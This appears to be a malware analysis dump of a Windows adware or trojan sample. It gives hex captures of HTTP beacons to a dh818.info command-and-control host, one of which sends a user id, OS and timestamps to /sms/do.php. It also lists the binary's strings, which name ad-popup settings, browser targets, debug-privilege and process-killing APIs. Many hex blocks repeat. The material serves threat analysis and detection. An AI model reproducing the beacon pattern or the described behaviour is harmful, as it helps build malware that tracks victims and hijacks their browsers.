0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f332f70 6f702e67 69662048   GET /3/pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.

0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a636f6d 70617469 626c653b 204d5349   .compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f332f70 6f702e67 69662048   GET /3/pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.

0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a636f6d 70617469 626c653b 204d5349   .compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.

0x00000000 (00000)   47455420 2f332f70 6f702e67 69662048   GET /3/pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.

0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a636f6d 70617469 626c653b 204d5349   .compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.


Strings
 % ) - 1                $   "   @indowsGNTJlindowss2uvwx4indows;XP>|ind                       LiSc \d   UV        ndows28Xindowsin7h                                                                                                             
                    im q>h\!l.ini'DnLdD=nLABdLElGyTimLMRunSpUci,-]2ngDclyTimjkRunLpD8lyTim?@%d&1#d
$        \In[\]n_` Exploghiqx\ilxplor.txvwShocusAddLo5dL8l:yTi>?@AddSpIcingDOlQyTiUVWAddLoopD$l&yTi:;<
ad%d
AllAdTimes
global
iC:\WINDOWS\VC.ini
LastAd
mHTTP
pass_url
url%d
...................
....................
0123456789ABCDEF
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
%02x%02x%02x%02x%02x%02x
??1type_info@@UAE@XZ
??2@YAPAXI@Z
??3@YAXPAX@Z
9a7b6r3k0u4e
_acmdln
_adjust_fdiv
AdjustTokenPrivileges
ad_num
Ad_Num%d
Ad_Time%d-1
Ad_Time%d-2
Ad_Type%d
Ad_Url%d
ADVAPI32.dll
AllAdTimes
.?AV_com_error@@
.?AVtype_info@@
BuildExplicitAccessWithNameA
chrome
CloseDesktop
CloseHandle
CoCreateInstance
CoInitialize
_controlfp
CoUninitialize
CreateDesktopA
CreateProcessW
CreateThread
__CxxFrameHandler
_CxxThrowException
D$4h}{
DcomLaunch
ddg%ndP
ddg%odP
ddRichQ
DeleteFileA
\Device\HarddiskVolume1
\Device\HarddiskVolume2
\Device\HarddiskVolume3
\Device\HarddiskVolume4
\Device\HarddiskVolume5
\Device\HarddiskVolume6
D$Lh02
D$Lhey
__dllonexit
D$pj7PS
DwdInTime
Embedding
_except_handler3
explorer.exe
fclose
FindFirstFileA
FindNextFileA
FindWindowA
FindWindowExA
firefox
F\VC.ini
GetCommandLineA
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetLastError
GetLocalTime
GetLogicalDriveStringsA
__getmainargs
GetModuleHandleA
GetNamedSecurityInfoA
GetPrivateProfileIntA
GetPrivateProfileIntW
GetPrivateProfileStringW
GetProcAddress
GetProcessImageFileNameA
GetStartupInfoA
GetStartupInfoW
GetThreadDesktop
GetVersion
GetVersionExA
global
IDList
iexplore
_initterm
Internet Explorer.
InternetShortcut
IsWindow
jqwt;-+1+lj<40/kjen;02-wnr.am,qjq
KERNEL32.dll
kvqx?.-2,ak<0:*jknm>=;.1+onfg/eme
LastAd
L$DQh0
LoadLibraryA
LocalFree
LookupPrivilegeValueA
L$(PQj
lstrcatW
lstrcmpiA
L$TPQj
L$TPQV
lwuq2.-5-ei=3:/koej8:2-2,snr-bk`
MACHINE\SOFTWARE\Classes\CLSID
malloc
maxthon
_mbslwr
_mbsnbcpy
_mbsstr
mbstowcs
MessageBoxA
MSVCRT.dll
MultiByteToWideChar
m|vt?'.360/6>4162/hkdm
Name%d
ntdll.dll
ole32.dll
OLEAUT32.dll
OleRun
_onexit
OpenProcess
OpenProcessToken
OutputDebugStringA
pass_url
PathRemoveFileSpecA
__p__commode
__p__fmode
PopUrl
PostMessageA
printf
Progman
PSAPI.DLL
PUQUUj
QueryDosDeviceA
RASAPI32.dll
RasEnumConnectionsA
RasGetErrorStringA
RasHangUpA
ReadProcessMemory
rename
SeDebugPrivilege
SendMessageA
__set_app_type
SetEntriesInAclA
SetNamedSecurityInfoA
SetThreadDesktop
SetThreadPriority
__setusermatherr
SHChangeNotify
SHELL32.dll
SHELLDLL_DefView
SHFileOperationA
SHGetSpecialFolderPathA
SHGetSpecialFolderPathW
SHLWAPI.dll
ShowCursor
_snprintf
sogouexplorer
sprintf
"%s" "%s"
%s\%s.lnk
%s%s%s
strchr
_strcmpi
strstr
svchost.exe
SysListView32
t3SSSV
T$DPRj
T$DRh0
TerminateProcess
theworld
!This program cannot be run in DOS mode.
ttraveler
\*.url
url_num
USER32.dll
wcslen
_wcsupr
WideCharToMultiByte
WinExec
WndPerAd
wsprintfA
_XcptFilter
ZwQueryInformationProcess
ZwQuerySystemInformation
ZwTerminateProcess